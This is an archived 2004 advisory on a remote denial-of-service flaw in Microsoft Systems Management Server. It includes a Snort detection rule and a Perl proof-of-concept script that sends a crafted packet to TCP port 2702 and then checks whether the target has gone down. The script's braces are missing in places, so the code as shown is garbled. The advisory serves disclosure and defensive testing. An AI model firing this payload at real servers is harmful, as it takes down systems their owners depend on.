TUCoPS :: Windows :: hack0099.htm

MS SMS DOS PoC code and Snort sig
MS SMS DOS Proof-of-concept code and Snort sig


Advisory Name : Microsoft Systems Management Server Remote Denial Of Service Vulnerability

Release Date : 22 July, 2004

Application : Microsoft Systems Management Server (SMS)

Author : MacDefender / SRR Project Group of Ready Response (srr@readyresponse.org) 



In response to a remote denial of service vulnerability in the Microsoft Systems Management Server:



We have developed a snort signature to detect attempted DOS attacks to the SMS port 2702 port on a server.

In addition we have also released perl code that will demonstrate the vulnerability against a live server, so administrators will be able to test the security of their own Systems Management Server's.



The snort (www.snort.org) signature we have developed for identifying an attempted DOS attack to a Systems Management Server is as follows:

alert tcp any 1024: -> any 2702 (msg: "MS SMS DOS"; content: "|52 43 48 30|";depth: 4;isdataat: 139; classtype: denial-of-service;)


Proof of concept code

You may test your own Systems Management Server's for vulnerability to this issue by using the following perl code:




# SMS DOS proof of concept and test code



use Socket;

use IO::Socket;

if (@ARGV != 1)


	print "usage: $0 \n";



$host = shift(@ARGV);

$hexmsg = converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");

print "\nCreating socket for connection to: $host\n\n";

my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto => "tcp") or die("Could not create socket: $!\n");


print $sock1 "$hexmsg";

while (<$sock1>)




print "\nPacket sent to $host (please wait) ...\n";


print "Verifying status of $host ...\n";


my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto => 'tcp') or die("\nDOS was successful - $host is down ...\n");

print "\nAttempt was not successful. $host is still alive and responding ...\n";




# End main code, start subs


sub converthex


	local ($l) = @_;

	$l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;

	return $l;



# End code




Credit for the development of the snort signature and proof of concept code is credited to MacDefender / SRR project group of Ready Response (http://www.readyresponse.org / srr@readyresponse.org) 

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